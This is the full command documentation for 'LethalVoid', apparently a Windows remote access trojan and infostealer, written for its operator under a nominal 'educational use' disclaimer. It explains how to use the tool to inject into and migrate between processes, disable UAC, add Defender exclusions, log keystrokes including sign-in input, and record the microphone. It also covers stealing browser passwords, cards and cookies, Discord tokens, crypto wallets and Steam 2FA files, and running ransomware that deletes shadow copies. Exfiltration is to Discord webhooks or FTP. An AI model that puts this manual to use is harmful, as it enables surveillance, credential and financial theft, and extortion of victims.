Session commands

warning

The following commands should only be executed on machines owned by consenting parties. The commands and this documentation exist solely for legal and educational purposes, we are not responsible for any harm caused by the usage of these commands.

Core commands

close

session 0> close -h

USAGE
=====
	-x to end client process
	-h to display all options

	`close` to close the current session

This command can be used to disconnect the selected client. Without any flags passed, the client is only disconnected temporarily, and tries to connect back to the server immediately after disconnecting. This means if you are executing listen with the -y flag, it will reconnect instantly. To prevent this you can pass the -x flag to the close command to kill the client process. This way it disconnects until the next system startup / payload execution.

background

session 0> background
[INFO] Backgrounding session...

[INFO] Exiting to menu...

lethalvoid> ...

As seen here, after selecting a client with the session command, we can leave this session with the background command. This does not disconnect the client.

settimeout

session 0> settimeout -h

USAGE
=====
	-h to display all options

	`settimeout <time in seconds>` to set timeout client (default is 30 seconds)

This is the client-specific version of the server's global settimeout command. For more information on client timeout, see the server documentation.

uninstall

session 0> uninstall -h

USAGE
=====
	-h to display all options

	`uninstall` to remove lethalvoid files and persistence of this instance from client machine.

As the name suggests, this command removes all traces of lethalvoid from the infected machine. The currently active client connection will persist since it is injected into a Windows process, and not running from a file directly. However, upon restarting the machine, all connection to the previously infected machine will be lost. Of course, this command has no effect on payload-only formats.

Basic commands

pwd

session 0> pwd

Prints the current working directory.

cd

session 0> cd <directory>

Changes the current working directory.

ls

session 0> ls (<directory>)

Lists files in directory.

whoami

session 0> whoami

Prints the current user the lethalvoid process is running under.

ip

session 0> ip

Prints the client IP address.

shutdown

session 0> shutdown -h

USAGE
=====
	-h to display all options

	`shutdown` to force client machine shutdown

Powers down the client machine.

reboot

session 0> reboot -h

USAGE
=====
	-h to display all options

	`reboot` to force client machine reboot

Reboots the client machine.

Process commands

migrate

session 0> migrate -h 

USAGE
=====
	-h to display all options

	`migrate <process name/PID>` migrates lethalvoid to another process and starts new session

	Not supported for payload-only formats.

In non-payload-only formats, LethalVoid runs injected into an existing Windows process. To inject LethalVoid into another process, start the new instance's execution, and end the current instance, use the migrate command. The (64-bit) injectable process can be specified by its PID or process name.

impersonate

session 0> impersonate -h

USAGE
=====
	-h to display all options

	`impersonate <process name/PID>` makes lethalvoid client impersonate the given process' token

	Warning: During some lethalvoid functions, this impersonation is temporarily overwritten.

The impersonate command can be used to make the LethalVoid instance impersonate the token of a specified process. However, this is sometimes temporarily ignored, as some internal LethalVoid routines require impersonation of certain tokens.

process

session 0> process -h

USAGE
=====
	-h to display all options

	`process` to print name of process lethalvoid is currently injected into

Prints the name and PID of the process lethalvoid is currently injected into, or running under (if it is in payload-only format). This process matters for some commands that may require a certain environment to function as desired. The process it runs injected into can be changed, if not in payload-only format, by using the migrate command.

ps

session 0> ps

Lists processes running on client.

File commands

download

session 0> download -h

USAGE
=====
	-h to display all options

	`download <file 1> (<file 2>...)` to download files from client machine
	`download %USERPROFILE%\\*\\*.png` to download multiple files as a ZIP using wildcards

	Warning: Only use absolute paths when using download with wildcards

Downloads specified files from client machine. If multiple files are specified (possibly with the use of wildcards), the files are compressed into a temporary ZIP file on the client machine, before being sent to the server. Wildcards can be used to indicate both directory names and file names, similar to Linux.

upload

session 0> upload -h

USAGE
=====
	-h to display all options

	`upload <file>` to upload file to client machine

Uploads specified local file to current working directory of client machine.

cat

session 0> cat <file>

Prints specified file's contents

rm

session 0> rm

Removes file from client machine.

rmdir

session 0> rmdir

Removes directory from client machine.

mkdir

session 0> mkdir

Creates directory on client machine.

Administrative commands

setuac

session 0> setuac -h

USAGE
=====
	-h to display all options

	`setuac on/off` to enable/disable User Account Control on client machine
	Warning: Client can be notified and may require reboot to take effect.

This allows you to enable and disable the User Account Control (UAC). With UAC disabled, applications can run as administrator without requiring client user permission, read more on UAC here.

defenderexclude

session 0> defenderexclude -h

USAGE
=====
	-h to display all options

	`defenderexclude process <process>` to add process to Windows Defender exclusions
	`defenderexclude path <path>` to add path to Windows Defender exclusions

This adds specified processes and paths to the Windows Defender exclusions, preventing them from being flagged as malware.

Interactive commands

keylog

session 0> keylog -h

USAGE
=====
	-h to display all options

	`keylog start` to start logging keystrokes on client machine
	`keylog dump` to dump logged keystrokes 
	`keylog clear` to clear recorded keystrokes
	`keylog stop` to stop logging keystrokes

	Cannot capture desktop input from default process (svchost.exe) as it is a service, migrate to conhost.exe or another process in an interactive user session to capture desktop input (winlogon.exe for sign-in screen input).

This command can be used to read client user keyboard input. By-design, it does not inject the keylogging code into a process running in an interative session like some other commands (e.g. run, setwallpaper). This means that if you want to record normal desktop keyboard input, the payload first has to be migrated to a process in an interactive session. The reason for this, is that it means that, for example, login screen input can be captured by migrating to winlogon.exe. The keylog start command is used to start recording input, filling the buffer with recorded presses. This buffer can be read, using the keylog dump command. To empty the buffer while still recording, you can use keylog clear, and keylog stop is used to stop recording inputs without emptying the buffer.

micrecord

session 0> micrecord -h  

USAGE
=====
	-h to display all options

	`micrecord start` to start capturing microphone input on client machine
	`micrecord dump <file>` to dump captured audio to file and clear audio buffer (<file> is optional)
	`micrecord stop` to stop capturing microphone input

Micrecord reads input from the microphone currently in use on the client machine. You can start recording by using the micrecord start command, filling the audio buffer with the microphone input, and stop recording with micrecord stop. This audio buffer can then be outputted to a file and emptied, by using the micrecord dump command.

screenshot

session 0> screenshot -h

USAGE
=====
	-h to display all options

	`screenshot (<output file>)` to take screenshot of client screen (<output file> is optional)

	Cannot capture regular desktop screen from default process (svchost.exe) as it is a service, migrate to another process to capture desktop screen.

This command takes a screenshot of the client user's monitors and outputs it to a bmp file.

setwallpaper

session 0> setwallpaper -h

USAGE
=====
	-h to display all options

	`setwallpaper <local image>` to upload and set user wallpaper

This command uploads the specified image file and sets it as the client user's wallpaper. If the payload is not running in an interactive session, it injects the wallpaper shellcode into ctfmon.exe. This allows you to set the wallpaper even if the payload is running under a SYSTEM service.

run

session 0> run -h

USAGE
=====
	-C to run program using the current process
	-H to run program hidden from view
	-h to display all options

	`run <file> (<argument>)` to run file on client machine

run can be used to execute programs present on the client machine, and return the newly created process' PID. By default, the program is not executed using the current process if the payload is not running in an interactive session. Instead, the run shellcode is injected into ctfmon.exe. To force the program to be executed by the current process, the -C flag is used. This often results in the window not being visible if the payload is not running in an interactive session. To prevent the program from creating a visible window, the -H flag can be used. For some programs, this flag may not have an effect. An argument can also be passed to the program, for example: run Notepad.exe newdocument.txt

pkill

session 0> pkill -h

USAGE
=====
	-h to display all options

	`pkill <process name/PID>` to kill a process running on client machine

This commmands lets you kill processes specified by either its PID or its name. If specified by name, the first instance of that process is killed, not all instances.

bluescreen

session 0> bluescreen -h

USAGE
=====
	-h to display all options

	`bluescreen` to make client system crash and display blue screen of death

This command crashes the client machine, causing Windows to display the blue screen of death.

crash

session 0> crash -h

USAGE
=====
	-h to display all options

	`crash` to make client process/system crash (depending on if the current process is crucial)

This command crashes the payload process. This may result in the client machine crashing as well, if the payload is running injected in a critical Windows process.

Stealer commands

getwifi

session 0> getwifi -h

USAGE
=====
	-h to display all options

	`getwifi` to get saved client wifi passwords (only works if wifi is turned on)

This command grabs the client's saved WIFI networks, displaying their names and passwords.

getbrowser

session 0> getbrowser -h

USAGE
=====
	-h to display all options

	`getbrowser edge logins`
	`getbrowser operagx cookies`
	`getbrowser brave history`
	`getbrowser operagx autofills`
	`getbrowser all cards`

	Browsers: chrome, firefox, edge, brave, opera, operagx, yandex, comodo, epic, vivaldi (, all)

	Example use:
	getbrowser all cards logins history > userdata.txt

This command grabs client's browser data. For chromium-based browsers, LethalVoid supports v10 as well as v20 decryption (new encryption method used in chromium-based browsers). Note that v20 decryption requires SYSTEM-level access, this can be enabled by building the executing payload with the System flag.
It is capable of grabbing:

Saved usernames & passwords (specified by logins)
Saved credit cards (specified by cards) (includes Name, Nickname, Expiration Month/Year, Card Number and CVC (if set by user))
Cookies (specified by cookies)
Browsing history (specified by history)
Misc saved autofill fields (specified by autofills)

Keep in mind that not all browsers support the storing of all of this information. For example: Firefox does not support saving credit card details, and Epic Privacy Browser does not store browing history.
It supports grabbing this data from:

Google Chrome (specified by chrome)
Firefox (specified by firefox)
Microsoft Edge (specified by edge)
Brave (specified by brave)
Opera (specified by opera)
Opera GX (specified by operagx)
Yandex (specified by yandex)
Comodo (specified by comodo)
Epic Privacy Browser (specified by epic)
Vivaldi (specified by vivaldi)

To grab the specified data from every one of these browser present on the system, all can be specified.

getdiscord

session 0> getdiscord -h 

USAGE
=====
	-h to display all options

	`getdiscord` to grab client discord tokens (also supports Canary versions and Lightcord)

This commands grabs all Discord tokens from the client machine. It grabs them from the local Discord files, not the browser, so Discord must be installed for the payload to find the tokens. The command supports grabbing the tokens from all common versions of Discord, as well as LightCord (a modded Discord client).

getwallets

session 0> getwallets -h 

USAGE
=====
	-h to display all options

	`getwallets (<output file>)` to grab client local crypto currency wallet files (see website for supported wallets)

This command looks for all paths recognized to contain certain crypto wallets' files, and grabs the files. The files are then packed into a zip file and retrieved. The following wallets are supported:

Bitcoin Core
Bitcoin Core (Old)
Dogecoin
Raven Core
Daedalus Mainnet
Blockstream Green
Wasabi Wallet
Ethereum
Electrum
ElectrumLTC
Exodus
Electron Cash
MultiDoge
Jaxx desktop
Jaxx Desktop (Old)
Atomic
Binance
Coinomi

getoutlook

session 0> getoutlook -h

USAGE
=====
	-h to display all options

	`getoutlook` to grab locally saved client outlook credentials

This command grabs locally saved outlook emails and passwords. This does not work for passwords that are not saved locally, which is quite common.

getqtox

session 0> getqtox -h

USAGE
=====
	-h to display all options

	getqtox (<output file>) to grab client qtox ini and db files

This command grabs local ini and db files from the qTox messaging client and returns these files packed into qtoxdatapkg.zip.

getpidgin

session 0> getpidgin -h

USAGE
=====
	-h to display all options

	getpidgin (<output file>) to grab client XML files containing plaintext login credentials

This command grabs XML files from the Pidgin messaging client, these files contain unencrypted and unencoded plaintext usernames and passwords. These files are returned packed into pidgindatapkg.zip.

gettelegram

session 0> gettelegram -h

USAGE
=====
	-h to display all options

	`gettelegram (<output file>)` to grab client telegram files

getsteam

session 0> getsteam -h

USAGE
=====
	-h to display all options

	`getsteam (<output file>)` to grab client steam ssfn and config files

This command grabs local ssfn and config files from Steam and returns these files packed into steamdatapkg.zip. The ssfn files can be used to bypass Steam 2FA.

ransom

session 0> ransom -h

USAGE
=====
	-h to display all options

	`ransom <directory to encrypt> (<local ransom note>) (<local wallpaper>)` to encrypt a directory and delete shadow copies. If specified, after encryption the wallpaper will change and a ransom note will be displayed.
	Use "deransom" with the returned key to decrypt the affected files

	Example use:
	ransom C:\\ ransom_note.txt ransom_wallpaper.jpg

This command, if specified, firstly uploads the specified ransom note and wallpaper. It then generates a 256-bit AES key and recursively encrypts all files in the specified directory, appending the .LOCKED extension. While encrypting, it excludes paths that contain any of the strings:

$Recycle.Bin
Windows
boot
NTUSER.DAT
readme.txt
newbgimage (the filename of the uploaded ransom wallpaper)
.LOCKED (the file extension appended to encrypted files)

While encrypting, it leaves the ransom note in a README file in every encrypted directory, if a note was specified. After this, the shadow copies are deleted, and the uploaded wallpaper is applied (if specified). It then Base64 encodes the used AES key and returns it, before deleting it from memory. This returned key can be used to decrypt all affected files, using the deransom command.

deransom

session 0> deransom -h

USAGE
=====
	-h to display all options

	`deransom <directory to decrypt> <Base64 encoded AES key>` to decrypt all encrypted files below the specified directory.

	Example use:
	deransom C:\\ Ybc6N9nZuJ1/KXeZ3KOddfNGZLWApHZSWukWaxjprqc=

After using the ransom command, the returned Base64 encoded AES key can be used with the deransom command to decrypt all affected files and remove the dropped ransom notes (if applicable). Make sure the directory specified covers all files you want to be decrypted. The wallpaper will not be changed back to the original.

Exfiltration commands

discordsend

session 0> discordsend -h

USAGE
=====
	-h to display all options

	`discordsend <webhook url> "<lethalvoid command...>"` to execute command on client machine and send output to discord webhook ("'s around command)

	Example use:
	discordsend https://discord.com/api/webhooks/MYWEBHOOK "ls \"C:\\Program Files\\\""

This command can be used to execute a given command on the client machine, but instead of sending the output to a LethalVoid server, it is sent to the specified Discord webhook. This is convenient when using the startup commands in the builder, so that you have a way of getting command output without having all clients connect to a LethalVoid server. This can for example be used in combination with the getbrowser command:

It can not only handle commands that output text, but also commands that return files such as screenshot, download. In this case, the returned file is simply sent as an attachment. If a command's output text consists of too many characters to be sent in 1 message by the webhook, it will be split into multiple parts.

ftpsend

session 0> ftpsend -h

USAGE
=====
	-h to display all options

	`ftpsend <ftp url> (<username>) (<password>) "<lethalvoid command...>"` to execute command on client machine and send output to FTP server as file ("'s around command)

	Example use:
	ftpsend 10.0.2.2:21 "myusername" "mypassword" "ls \"C:\Program Files\""

This command, similar to discordsend exfiltrates the given command's output to the specified FTP server. This is convenient when using the startup commands in the builder, so that you have a way of getting command output without having all clients connect to a LethalVoid server. You can pass a username and password to authenticate for the FTP server, but these are optional.

Other commands

discordspam

warning

The usage of this command goes against the Discord ToS, and the collected tokens' users may be banned. The command and this documentation exist solely for educational purposes, we are not responsible for any harm caused by the usage of this command. See the rules page for more information.

session 0> discordspam -h

USAGE
=====
	-h to display all options

    `discordspam <spam targets> <message>` (<client file path>) (<min dm delay ms (default 100)>) (<max dm delay ms (default 1000)>)

    spam targets: friends/servers/servermembers/all

    Example use:
    discordspam all "Hello world" "%USERPROFILE%\\doc.txt"

This command firstly collects all Discord token's on the client machine (using the same method as getdiscord). It then iterates over the collected tokens and sends the specified message (along with the file attachment, if a file was specified), to:

friends all friends of the current token's user.
servers all servers the current token's user is in.
servermembers all members of the servers the current token's user is in.
all all of the above. Keep in mind that the specified file path should correspond to a file on the client's machine, not the server. This means if the file is not already present on the client system, it must first be uploaded.

idletime

session 0> idletime -h

USAGE
=====
	-h to display all options

	`idletime` to print number of seconds the client user has been idle for

Prints the amount of time the client user's system has has been idle.

uptime

session 0> uptime -h

USAGE
=====
	-h to display all options

	`uptime` to print duration the client system has been started for

Prints the amount of time since the client user's system was turned on.

shexec

session 0> shexec -h

USAGE
=====
	-h to display all options

	`shexec "<command>"` to run CMD command on client machine

Prints the amount of time since the client user's system was turned on.

memexec

session 0> memexec -h

USAGE
=====
	-h to display all options

	`memexec <file> (<argument>)` to upload shellcode or a DLL to client and execute in memory with optional argument. DLL's are executed from DLLMain

This command uploads the specified file contents, which are then stored in memory without being written to disk. After this, the file is analysed to decide if it is a DLL or shellcode. If the file is a DLL, it is reflectively injected into the process LethalVoid is running under, executing DllMain. A pointer to a string containing the passed argument can be found in the lpvReserved parameter of DllMain.
If the file is found to be shellcode, it is also injected and executed, the argument here is also passed as a pointer to a string.

Core commands​

close​

background​

settimeout​

uninstall​

Basic commands​

pwd​

cd​

ls​

whoami​

ip​

shutdown​

reboot​

Process commands​

migrate​

impersonate​

process​

ps​

File commands​

download​

upload​

cat​

rm​

rmdir​

mkdir​

Administrative commands​

setuac​

defenderexclude​

Interactive commands​

keylog​

micrecord​

screenshot​

setwallpaper​

run​

pkill​

bluescreen​

crash​

Stealer commands​

getwifi​

getbrowser​

getdiscord​

getwallets​

getoutlook​

getqtox​

getpidgin​

gettelegram​

getsteam​

ransom​

deransom​

Exfiltration commands​

discordsend​

ftpsend​

Other commands​

discordspam​

idletime​

uptime​

shexec​

memexec​